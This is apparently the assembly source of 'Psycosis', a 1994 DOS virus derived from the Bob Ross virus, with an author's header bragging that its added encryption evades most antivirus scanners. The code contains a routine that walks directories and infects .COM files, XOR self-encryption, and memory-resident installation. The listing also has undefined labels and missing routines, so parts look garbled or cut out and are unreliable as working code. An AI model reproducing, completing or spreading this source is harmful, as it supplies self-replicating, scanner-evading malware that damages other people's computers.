Professional Documents
Culture Documents
; origin : sweden
; author : the unforgiven
; date : 03/01/94
; this is yet another mutation of the bob ross virus, written by dark
; angel of phalcon/skism in september 1991. in my last version of this
; virus, i excluded the encryption, and included some destructive code
; instead. in this one, i added a new encryption, and thereby it went
; undetectable by most of the scanners. yes, scan/findviru/msav/cpav,
; can't find it. f-prot doesn't founds a shit, but tbscan's most
; heuristics scanner says that it "probably" is infected with some
; unknown virus. the "standard" heuristic gets some flags, but not
; enough to say that it's infected. therefor i'd like to claim that
; the scanners sucks!
; i had thought to change much more in the code, for example the
; spreading routine. this virus will search the whole tree for
; files to infect, and becomes therefor pretty slow, and easily
; detected. but hell, it spreads!, hm, 3 files each run!..
;=============================================================================
; **** psycosis ****
;=============================================================================
dta_fileattr equ 21
dta_filetime equ 22
dta_filedate equ 24
dta_filesize equ 26
dta_filename equ 30
part1_start:
jmp word ptr duh
duh dw middle_part_end - part1_start + 100h
duh2 dw 0
part1_end:
middle_part_start:
middle_part_end:
;=============================================================================
;part 2 begins: dis is the d-cool part
;=============================================================================
part2_start:
cld
call decrypt
mov si, offset go
add si, offset_off
jmp si
;encrypt_val db 00h
encrypt_val dw 0
decrypt:
encrypt:
xor_loop:
lodsb ; ds:[si] -> al
xor al, ah
stosb
loop xor_loop
ret
cheater:
ret
copy_rest_stuff:
push si ; si -> buffer3
call encrypt
mov cx, part2_size
pop dx
add dx, offset part2_start - offset buffer3
mov ah, 40h
int 21h
call decrypt
bam_bam:
ret
go:
add si, offset buffer - offset go
mov di, si
add di, offset buffer2 - offset buffer
mov cx, part1_size
rep movsb
go_psycho:
jmp psycho
origattr db 0
origtime dw 0
origdate dw 0
filesize dw 0 ; size of the uninfected file
oldhandle dw 0
;=============================================================================
;d-traversal function begins
;=============================================================================
traverse_fcn proc near
push bp ; create stack frame
mov bp,sp
sub sp,44 ; allocate space for dta
push si
jmp infect_directory
in_fcn:
mov ah,1ah ;set dta
lea dx,word ptr [bp-44] ; to space allotted
int 21h ;do it now, do it hard!
goto_error:
jmp error
enuff_for_now:
;set nest to nil
mov si, offset nest ; in order to
add si, offset_off ; halt the d-cool
mov word ptr [si], 0 ; traversal fcn
jmp short cleanup
return_to_fcn:
jmp short in_fcn ;return to traversal function
infect_directory:
mov ah, 1ah ;set dta
mov dx, offset dta ; to dta struct
add dx, offset_off
int 21h
find_first_com:
mov ah, 04eh ; find first file
mov cx, 0007h ; any file
mov dx, offset com_mask ; ds:[dx] --> filemask
add dx, offset_off
int 21h ; fill dta (hopefully)
jc return_to_fcn ; <sigh> error #e421:0.1
jmp check_if_com_infected ; i<___-cool! found one!
find_next_file2:
mov si, offset infec_now ; another loop,
add si, offset_off ; another infection
dec byte ptr [si] ; infected three?
jz enuff_for_now ; if so, exit
find_next_file:
mov ah,4fh ; find next
int 21h
jc return_to_fcn
check_if_com_infected:
mov si, offset dta + dta_filename + 6 ; look at 7th letter
add si, offset_off
cmp byte ptr [si], 'd' ; ??????d.com?
jz find_next_file ; don't kill command.com
do_again:
mov ah, 2ch ; get time
int 21h
add dl, dh ; 1/100 sec + 1 sec
jz do_again ; don't want orig strain!
mov di, dx
add di, offset oldhandle - offset dta - dta_filename
; copy filehandle to
; oldhandle
stosw ; ax -> es:[di]
xchg ax, bx ; file handle in bx now
call copy_rest_stuff
pop si
add si, offset oldhandle - offset buffer3
mov bx, word ptr [si]
mov ax, 5701h ; restore
add si, offset origtime - offset oldhandle
mov cx, word ptr [si] ; old time and
add si, 2
mov dx, word ptr [si] ; date
int 21h
jmp find_next_file2
gotoerror:
jmp error
psycho:
push es
mov byte ptr cs:[100h],0 ; initialize fingerprint
xor bx, bx ; zero bx for start
mov ax, cs
init1: inc bx ; increment search segment
mov es, bx ; value
cmp ax, bx ; not installed if we reach
je not_installed_yet ; the current segment
mov si, 100h ; search segment for
mov di, si ; fingerprint in first
mov cx, 4 ; four bytes
repe cmpsb ; compare
jne init1 ; if not equal, try another
jmp quit_init ; else already installed
not_installed_yet:
pop es
mov word ptr cs:[counter], init_delay
mov word ptr cs:[d_mess], 1
push es
mov ax, ds:[2ch] ; deallocate program
mov es, ax ; environment block
mov ah, 49h
int 21h
pop es
mov ax, 3100h ; tsr
mov dx, (offset int_end - offset int_start + offset part1_end - offset
code + 4 + 15 + 128) shr 4
int 21h
int 20h ; in case of error
quit_init:
pop es
error: ; on error, quit
quit:
; if get drive, place it here (restore, and change to in the beginning).
mov ah, 3bh ; change directory
mov dx, offset root_dir ; to the root dir
add dx, offset_off
int 21h
xor cx, cx
mov cl, al ; length of string
mov ax, 1300h ;
mov bx, 0070h ; page 0, inverse video
xor dx, dx ; (0,0)
int 10h ; display es:bp
inc word ptr cs:[d_mess]
cmp word ptr cs:[d_mess], num_messages
jnz sigh
mov word ptr cs:[d_mess], 1
_int_08_handler endp
int_end:
part2_end:
code ends
end part1_start